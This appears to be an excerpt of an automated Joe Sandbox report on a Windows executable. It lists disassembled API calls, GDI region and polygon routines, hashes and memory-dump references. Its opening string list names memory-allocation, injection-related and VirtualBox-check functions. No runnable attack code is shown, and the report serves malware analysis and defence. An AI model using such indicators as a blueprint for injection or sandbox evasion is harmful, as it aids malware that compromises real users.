Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                                          • API String ID: 4197412122-1627083277
                                                                                          • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                                          • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                                          • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                                          • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                                          • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                                            • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                                          • _ftol.MSVCRT ref: 0040A30F
                                                                                          • 6CF39B80.MFC42(?,?,00000000,?,00000000), ref: 0040A33D
                                                                                          • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                                          • 6CEFE6C0.MFC42(?), ref: 0040A354
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                                            • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                                          • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                                          • 6CF30E90.MFC42 ref: 0040A387
                                                                                          • 6CF37850.MFC42 ref: 0040A3A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Copy$Window$MessageSend$F37850_ftol
                                                                                          • String ID:
                                                                                          • API String ID: 1818263392-0
                                                                                          • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                                          • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                                          • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                                          • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 402 405830-40589c call 40a1b0 6CF309F0 6CF303E0
                                                                                          APIs
                                                                                            • Part of subcall function 0040A1B0: 6CF30310.MFC42(00000066,0040B588,?,00000000,?,0040B588,000000FF,00405856,00000000), ref: 0040A1D4
                                                                                            • Part of subcall function 0040A1B0: 6CEF50F0.MFC42(00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1E7
                                                                                            • Part of subcall function 0040A1B0: 6CEFF390.MFC42(00000080,0000000E,00000080,00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1F8
                                                                                            • Part of subcall function 0040A1B0: LoadIconA.USER32(00000000,00000080), ref: 0040A1FE
                                                                                          • 6CF309F0.MFC42 ref: 0040586C
                                                                                          • 6CF303E0.MFC42 ref: 00405880
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: F303F30310F309F390IconLoad
                                                                                          • String ID:
                                                                                          • API String ID: 63119970-0
                                                                                          • Opcode ID: 2349e14d3e6c0b0174860053992b03f3d25faf680dbb552c679795bca3051f16
                                                                                          • Instruction ID: 153d81c11514b1ea564d80a7333924dfc76de3118ee78e3df0b47c9266eed7c2
                                                                                          • Opcode Fuzzy Hash: 2349e14d3e6c0b0174860053992b03f3d25faf680dbb552c679795bca3051f16
                                                                                          • Instruction Fuzzy Hash: 74F082314547809BC360EF24C942B96B7E4FB48B24F508B2EE099936C0DF7C5809DB86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 405 40b2a2-40b2b7 6CF04ED0
                                                                                          APIs
                                                                                          • 6CF04ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                                          • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsRectSystem$ClientDrawE720F016F030F03130F37140F376F38460F387IconIconicMessageModeSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3990971271-0
                                                                                          • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                                          • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                                          • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                                          • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                                            • Part of subcall function 004039C0: 6CF37080.MFC42(?), ref: 004039EF
                                                                                            • Part of subcall function 004039C0: 6CF37160.MFC42 ref: 00403A26
                                                                                            • Part of subcall function 004039C0: 6CEF2DD0.MFC42(?), ref: 00403AC5
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                                            • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                                            • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                                            • Part of subcall function 004039C0: 6CF381F0.MFC42(?), ref: 00403B6C
                                                                                            • Part of subcall function 004039C0: 6CF381F0.MFC42(?,?), ref: 00403B7C
                                                                                            • Part of subcall function 004039C0: 6CF38500.MFC42(?,?,?), ref: 00403B8B
                                                                                            • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                                            • Part of subcall function 004039C0: 6CF381F0.MFC42(?), ref: 00403BA7
                                                                                            • Part of subcall function 004039C0: 6CF381F0.MFC42(?,?), ref: 00403BB3
                                                                                            • Part of subcall function 004039C0: 6CEF2C70.MFC42(00000000), ref: 00403BC1
                                                                                            • Part of subcall function 004039C0: 6CF37850.MFC42 ref: 00403BDE
                                                                                            • Part of subcall function 004039C0: 6CF37850.MFC42 ref: 00403BFE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyRect$F381$F37850_ftol$F37080F37160F38500Polygon
                                                                                          • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                                          • API String ID: 1448220572-821843137
                                                                                          • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                                          • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                                          • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                                          • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                                            • Part of subcall function 00403E10: 6CF37080.MFC42(?), ref: 00403E71
                                                                                            • Part of subcall function 00403E10: 6CF37160.MFC42(00000005,00000000,00000000,?), ref: 00403EA1
                                                                                            • Part of subcall function 00403E10: 6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00403F3C
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                                            • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                                            • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                                            • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                                            • Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00403FEA
                                                                                            • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                                            • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                                            • Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00404019
                                                                                            • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                                            • Part of subcall function 00403E10: 6CEF2C70.MFC42(00000000,00000000), ref: 0040405D
                                                                                            • Part of subcall function 00403E10: 6CF37850.MFC42 ref: 0040407A
                                                                                            • Part of subcall function 00403E10: 6CF37850.MFC42 ref: 00404098
                                                                                            • Part of subcall function 00403E10: 6CF37850.MFC42 ref: 004040B1
                                                                                            • Part of subcall function 00403E10: 6CF37850.MFC42 ref: 004040CD
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                                            • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                                            • Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00404053
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                                          • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyRect$F37850$CreateF376Polygon$Combine_ftol$F37080F37160
                                                                                          • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                                          • API String ID: 111202254-821843137
                                                                                          • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                                          • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                                          • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                                          • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1210 404ec0-404ef6 CopyRect call 403c20 1213 404f06-404f28 CopyRect call 403c20 1210->1213 1214 404ef8-404f03 1210->1214 1217 404f38-404f5a CopyRect call 403c20 1213->1217 1218 404f2a-404f35 1213->1218 1221 404f6a-404f8c CopyRect call 403c20 1217->1221 1222 404f5c-404f67 1217->1222 1225 404f9c-404fbe CopyRect call 403c20 1221->1225 1226 404f8e-404f99 1221->1226 1229 404fc0-404fcb 1225->1229 1230 404fce-404ff0 CopyRect call 403c20 1225->1230 1233 405000-405022 CopyRect call 403c20 1230->1233 1234 404ff2-404ffd 1230->1234 1237 405032-405054 CopyRect call 403c20 1233->1237 1238 405024-40502f 1233->1238 1241 405064-405086 CopyRect call 403c20 1237->1241 1242 405056-405061 1237->1242 1245 405096-4050b8 CopyRect call 403c20 1241->1245 1246 405088-405093 1241->1246 1249 4050c8-4050ea CopyRect call 403c20 1245->1249 1250 4050ba-4050c5 1245->1250 1253 4050fa-40511c CopyRect call 403c20 1249->1253 1254 4050ec-4050f7 1249->1254 1257 40512c-40514e CopyRect call 403c20 1253->1257 1258 40511e-405129 1253->1258 1261 405150-40515b 1257->1261 1262 40515e-405180 CopyRect call 403c20 1257->1262 1265 405190-4051b2 CopyRect call 403c20 1262->1265 1266 405182-40518d 1262->1266 1269 4051c2-4051e4 CopyRect call 403c20 1265->1269 1270 4051b4-4051bf 1265->1270 1273 4051f4-405216 CopyRect call 403c20 1269->1273 1274 4051e6-4051f1 1269->1274 1277 405226-405248 CopyRect call 403c20 1273->1277 1278 405218-405223 1273->1278 1281 405258-40527a CopyRect call 403c20 1277->1281 1282 40524a-405255 1277->1282 1285 40528a-4052b7 CopyRect call 403c20 1281->1285 1286 40527c-405287 1281->1286
                                                                                          APIs
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                                            • Part of subcall function 00403C20: 6CEF2DD0.MFC42(?), ref: 00403CFF
                                                                                            • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                                          • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyRect$_ftol
                                                                                          • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                                          • API String ID: 1144628616-677921438
                                                                                          • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                                          • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                                          • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                                          • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • 6CF016C0.MFC42 ref: 00409E42
                                                                                          • 6CF37140.MFC42 ref: 00409E51
                                                                                          • 73A24C40.GDI32(?), ref: 00409EBE
                                                                                          • 6CEFE720.MFC42(00000000), ref: 00409EC9
                                                                                          • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                                          • 73A24C00.GDI32(?,?,?), ref: 00409EFB
                                                                                          • 6CF376C0.MFC42(00000000), ref: 00409F06
                                                                                            • Part of subcall function 0040ABE0: 6CF38160.MFC42(?,?,00409F19,0040C6D4,00000000), ref: 0040ABED
                                                                                          • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                                          • 6CF38460.MFC42(00000000), ref: 00409F2D
                                                                                          • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                                          • 6CF387D0.MFC42(?,?,?), ref: 00409F57
                                                                                          • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                                          • 6CEFE6C0.MFC42(?), ref: 00409F94
